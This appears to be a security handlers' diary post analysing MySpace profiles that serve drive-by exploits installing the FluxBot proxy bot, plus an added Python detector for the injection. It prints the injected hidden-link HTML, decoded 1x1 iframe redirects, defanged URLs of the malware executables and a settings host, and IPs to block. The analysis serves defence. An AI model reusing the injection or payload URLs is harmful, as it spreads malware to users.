MySpace Flux Malware

CAREFUL! This diary contains links to malicious code!

A number of MySpace profiles include drive-by exploits. The exploits install a version of "flux bot", a very popular proxy network bot.

FluxBot (aka "FastFlux", "Storm") is typically used to hide phishing and malware delivery sites behind complex, ever-changing networks of proxy servers. A system infected with FluxBot will be used as one of these proxies.

Infected MySpace "Friend IDs": 39184135, 171598920, 22057010

A typical excerpt from an infected profile (obfuscated to protect the innocent):

<a style="text-decoration:none;;top:1px;left:1px;"
href="http://home. myspace. com. index. cfm. fuseaction.user.MyToken.
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.dusanbut.com/login.php"><img
style="border-width:0px;width:1280px;height:220px;"
src="http://x.myspace.com/images/clear.gif"></a></style>

The actual exploit / malware is served via an existing flux network. *.dusanbut.com redirects the user to an encoded JavaScript which decodes to:

<script>window.status="Done"</script>
<iframe src="http://fafb4c4c .com/header_03.gif" width=1 height=1></iframe>
The domain used here is of course again served via flux. header_03.gif in turn decodes to:

<script>window.status="Done"</script>
<iframe src="http://fafb4c4c .com/routine.php" width=1 height=1></iframe>
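Added example, not code from the diary or from the ISC handlers: a small detector for the two injection patterns quoted above, the off-site link hidden under a page-sized transparent clear.gif whose hostname is padded with myspace.com lookalike labels, and the 1x1 iframe in the decoded JavaScript. The sample HTML is constructed from the quoted snippets (hostnames kept defanged with spaces, which the scanner strips); the width threshold and the two-label "registrable domain" rule are assumptions.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

TRUSTED = ("myspace.com",)  # registrable domains a profile may legitimately link to

def clean(url):
    return url.replace(" ", "")  # strip the spaces the diary uses to defang hostnames

def registrable_domain(host):
    """Last two labels of a hostname (assumes a plain TLD such as .com); the lookalike labels in front are ignored."""
    return ".".join(host.lower().split(".")[-2:])

class ProfileScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []   # list of (reason, url)
        self._anchor = None  # href of the <a> currently open, if any

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "a" and a.get("href"):
            self._anchor = clean(a["href"])
            host = urlparse(self._anchor).hostname or ""
            if "myspace" in host and registrable_domain(host) not in TRUSTED:
                self.findings.append(("lookalike hostname, off-site domain", self._anchor))
        elif tag == "img" and self._anchor:
            # a transparent spacer image stretched across the page turns the
            # whole profile into a click target for the hidden link
            width = re.search(r"(?:^|;)\s*width:\s*(\d+)px", a.get("style", ""))
            if a.get("src", "").endswith("clear.gif") and width and int(width.group(1)) >= 800:
                self.findings.append(("oversized clear.gif link overlay", self._anchor))
        elif tag == "iframe" and a.get("width") == "1" and a.get("height") == "1":
            self.findings.append(("1x1 hidden iframe", clean(a.get("src", ""))))

    def handle_endtag(self, tag):
        if tag == "a":
            self._anchor = None

def scan(html):
    scanner = ProfileScanner()
    scanner.feed(html)
    return scanner.findings

# Constructed sample built from the snippets quoted in the diary (hostnames still defanged).
SAMPLE = '''<a style="text-decoration:none;;top:1px;left:1px;"
href="http://home. myspace. com. index. cfm. fuseaction.user.MyToken.xxxx.dusanbut.com/login.php"><img
style="border-width:0px;width:1280px;height:220px;" src="http://x.myspace.com/images/clear.gif"></a></style>
<script>window.status="Done"</script>
<iframe src="http://fafb4c4c .com/header_03.gif" width=1 height=1></iframe>'''
```

Running scan(SAMPLE) reports all three findings in document order; a profile that links only to myspace.com with a normally sized image produces none.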


Are we there yet? Yup, just one more (patched) Internet Explorer exploit to go. The exploit will install the .exe. For example:

http://fafb4c4c .com/session.exe (this is just the downloader stub)

The downloader will now retrieve the actual bot. Among others, we have seen these URLs:

http://www.myfiles .hk/exes/webdl3x/weby.exe
http://www.myfiles .hk/exes/webdl3x/oly.exe


Settings for the bot can be found here:

http://settings.iconnectyou .biz
http://fcs.camgenie .com/weby7.exe

Once it's all said and done, you will be a proud new member of the flux net, and soon you will find your system participating in phishing and similar endeavours.

A couple of IPs that may be worthwhile to block:

AS13767 | 72.232.254.218
AS15083 | 65.111.176.176
AS25761 | 72.20.18.86
AS25761 | 72.20.6.10

As you can imagine, it's a lot of messy work to decode all of this. I am just the messenger. This is work done by members of our great handler team.

Johannes
